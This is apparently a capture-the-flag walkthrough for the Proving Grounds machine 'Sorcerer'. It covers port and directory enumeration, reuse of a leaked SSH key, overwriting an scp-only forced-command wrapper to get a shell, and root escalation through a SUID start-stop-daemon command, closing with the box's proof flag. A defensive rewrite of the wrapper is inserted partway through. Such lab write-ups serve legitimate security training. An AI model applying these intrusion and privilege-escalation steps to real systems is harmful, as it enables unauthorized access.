
PG: Sorcerer | Walkthrough

November 24, 2021
3 min read

Enumeration

Nmap Scan

$ sudo nmap $ip -p22,80,111,2049,8080,35801,44957,57931,60477,7742 -sVC -Pn --version-all -O
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 81:2a:42:24:b5:90:a1:ce:9b:ac:e7:4e:1d:6d:b4:c6 (RSA)
| 256 d0:73:2a:05:52:7f:89:09:37:76:e3:56:c8:ab:20:99 (ECDSA)
|_ 256 3a:2d:de:33:b0:1e:f2:35:0f:8d:c8:d7:8f:f9:e0:0e (ED25519)
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 57252/udp mountd
| 100005 1,2,3 60477/tcp mountd
| 100021 1,3,4 35801/tcp nlockmgr
| 100021 1,3,4 43898/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7742/tcp open http nginx
|_http-title: SORCERER
8080/tcp open http Apache Tomcat 7.0.4
|_http-title: Apache Tomcat/7.0.4
|_http-favicon: Apache Tomcat
35801/tcp open nlockmgr 1-4 (RPC #100021)
44957/tcp open mountd 1-3 (RPC #100005)
57931/tcp open mountd 1-3 (RPC #100005)
60477/tcp open mountd 1-3 (RPC #100005)

Directory Fuzzing on port 7742

$ gobuster dir -u http://$ip:7742/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q -x php,html,txt
/default (Status: 301) [Size: 178] [--> http://192.168.66.100:7742/default/]
/index.html (Status: 200) [Size: 1219]
/index.html (Status: 200) [Size: 1219]
/zipfiles (Status: 301) [Size: 178] [--> http://192.168.66.100:7742/zipfiles/]

The /zipfiles/ directory has directory listing enabled; list it and download all four archives:

$ curl http://$ip:7742/zipfiles/
<html>
<head><title>Index of /zipfiles/</title></head>
<body bgcolor="white">
<h1>Index of /zipfiles/</h1><hr><pre><a href="../">../</a>
<a href="francis.zip">francis.zip</a> 24-Sep-2020 19:27 2834
<a href="max.zip">max.zip</a> 24-Sep-2020 19:27 8274
<a href="miriam.zip">miriam.zip</a> 24-Sep-2020 19:27 2826
<a href="sofia.zip">sofia.zip</a> 24-Sep-2020 19:27 2818
</pre><hr></body>
</html>

Inside max.zip is a copy of max's home directory, including an SSH key pair, a Tomcat users backup and an scp wrapper script:

$ unzip max.zip
Archive: max.zip
creating: home/max/
inflating: home/max/.bash_logout
inflating: home/max/.profile
creating: home/max/.ssh/
inflating: home/max/.ssh/id_rsa.pub
inflating: home/max/.ssh/authorized_keys
inflating: home/max/.ssh/id_rsa
inflating: home/max/tomcat-users.xml.bak
inflating: home/max/.bashrc
inflating: home/max/scp_wrapper.sh

Exploitation

Initial Access

The private key is accepted, but ssh with it does not give a shell:

$ ssh -i id_rsa max@$ip
The authenticity of host '192.168.66.100 (192.168.66.100)' can't be established.
ED25519 key fingerprint is SHA256:VS30806A83YR6y/jbQ1fv89VM1FjmXYbb9zmKkJ5N+4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.66.100' (ED25519) to the list of known hosts.
PTY allocation request failed on channel 0
ACCESS DENIED.
usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]
[-l limit] [-o ssh_option] [-P port] [-S program] source ... target
Connection to 192.168.66.100 closed.

Only scp is allowed. The wrapper runs as the forced command for max's key (it reads $SSH_ORIGINAL_COMMAND, which sshd sets only when a forced command is in effect): a requested command that starts with scp is executed unquoted, anything else prints ACCESS DENIED and then runs a bare scp, which is the usage text shown above. The 'scp'* match is loose, but the decisive flaw is where the wrapper lives: in max's home directory, which the permitted scp is free to write to.

$ cat scp_wrapper.sh
#!/bin/bash
# Forced-command wrapper: sshd places the client's requested command in SSH_ORIGINAL_COMMAND
case $SSH_ORIGINAL_COMMAND in
    'scp'*)
        # anything beginning with "scp" is run verbatim (unquoted, so word-split by the shell)
        $SSH_ORIGINAL_COMMAND
        ;;
    *)
        # every other request, including a plain login, is refused; bare scp just prints its usage
        echo "ACCESS DENIED."
        scp
        ;;
esac

Modify the wrapper so that the fallback branch runs bash instead of scp:

$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
    'scp'*)
        # unchanged: scp requests still go through, so the file can be uploaded with scp
        $SSH_ORIGINAL_COMMAND
        ;;
    *)
        # a plain ssh login now lands here and gets a shell instead of the usage text
        echo "Give me shell"
        bash
        ;;
esac

Overwrite the wrapper on the target with scp, which the forced command still permits. Because the file already exists, scp truncates and rewrites it in place without changing its mode, so the execute bit survives:

$ scp -i .ssh/id_rsa scp_wrapper.sh max@192.168.66.100:/home/max/scp_wrapper.sh

Now a plain ssh login hits the fallback branch. The PTY request is still refused, so the shell is non-interactive (no prompt), but commands read from stdin are executed:

$ ssh -i .ssh/id_rsa max@$ip
PTY allocation request failed on channel 0
Give me shell
whoami
max
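As an added example (not from the original walkthrough or from the box's own files), here is how the same scp-only forced command can be written so that the overwrite trick above no longer works. The deployment it assumes is hypothetical: the wrapper is installed root-owned as /usr/local/bin/scp_only, the key in authorized_keys is bound to it with restrict,command="/usr/local/bin/scp_only", and the key may only send or receive files under /home/max/upload (UPLOAD_DIR, check_scp_command and run_forced_command are names chosen here). Instead of matching any command that begins with scp, it accepts only the two server-side invocations OpenSSH's scp actually sends (scp -t <path> to receive, scp -f <path> to send), pins the path under the upload directory, rejects .., whitespace and any character outside a small allow-list, and execs scp with the already-validated words so nothing is re-parsed by a shell.

```shell
#!/bin/sh
# Added example: a restrictive forced-command wrapper for an scp-only SSH key.
# Not part of the Sorcerer box. Hypothetical deployment (assumptions):
#   - installed as /usr/local/bin/scp_only, owned by root, mode 0755
#   - authorized_keys entry: restrict,command="/usr/local/bin/scp_only" ssh-rsa AAAA...
#   - the key may only send/receive files under /home/max/upload
UPLOAD_DIR=/home/max/upload

# check_scp_command CMD -> exit status 0 if CMD is an acceptable server-side scp invocation.
# OpenSSH's scp runs exactly "scp -t <path>" on the receiving side and "scp -f <path>"
# on the sending side, so anything else (extra options such as -S included) is refused.
check_scp_command() {
    cmd=$1
    case $cmd in
        "scp -t $UPLOAD_DIR/"*|"scp -f $UPLOAD_DIR/"*) ;;
        *) return 1 ;;
    esac
    path=${cmd#scp -? }                 # strip the leading "scp -t " / "scp -f "
    case $path in
        *..*) return 1 ;;               # no traversal out of the upload directory
        *[!A-Za-z0-9/._-]*) return 1 ;; # whitespace, globs, quotes, extra words: refuse
    esac
    return 0
}

# run_forced_command: what happens when sshd invokes this script as the key's forced command.
run_forced_command() {
    if [ -n "${SSH_ORIGINAL_COMMAND:-}" ] && check_scp_command "$SSH_ORIGINAL_COMMAND"; then
        set -f                          # no pathname expansion while splitting
        set -- $SSH_ORIGINAL_COMMAND    # safe: validated to be "scp -t|-f <clean path>"
        shift                           # drop the leading "scp"
        exec /usr/bin/scp "$@"          # absolute path, no shell re-parsing of the words
    fi
    echo "ACCESS DENIED." >&2           # interactive logins and everything else end here
    exit 1
}

# Act as the forced command only when running under the installed name.
if [ "${0##*/}" = "scp_only" ]; then
    run_forced_command
fi
```

With this in place the walkthrough's upload of a new wrapper fails twice over: the path check confines writes to /home/max/upload, and the wrapper itself is owned by root outside the home directory. The checks are string checks on the requested path and do not follow symlinks, so the upload directory must not contain links the user could have planted by other means.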

Privilege Escalation

Misconfigured SUID

max@sorcerer:/tmp$ find / -type f -perm /4000 2>/dev/null
/usr/sbin/mount.nfs
/usr/sbin/start-stop-daemon
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/su
/usr/bin/mount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

start-stop-daemon is not SUID on a stock Debian install, so this one stands out. With -S it starts whatever executable -x names, with the process's effective UID (root here); -n with a random name ensures no already-running process of that name short-circuits the start; and the trailing -- -p is handed to the shell so a bash-based sh stays in privileged mode and keeps the effective UID instead of resetting it to the real one.

max@sorcerer:/tmp$ /usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
# whoami
root
# cat /root/proof.txt
26d037b0cb0b3552d13588175447b12d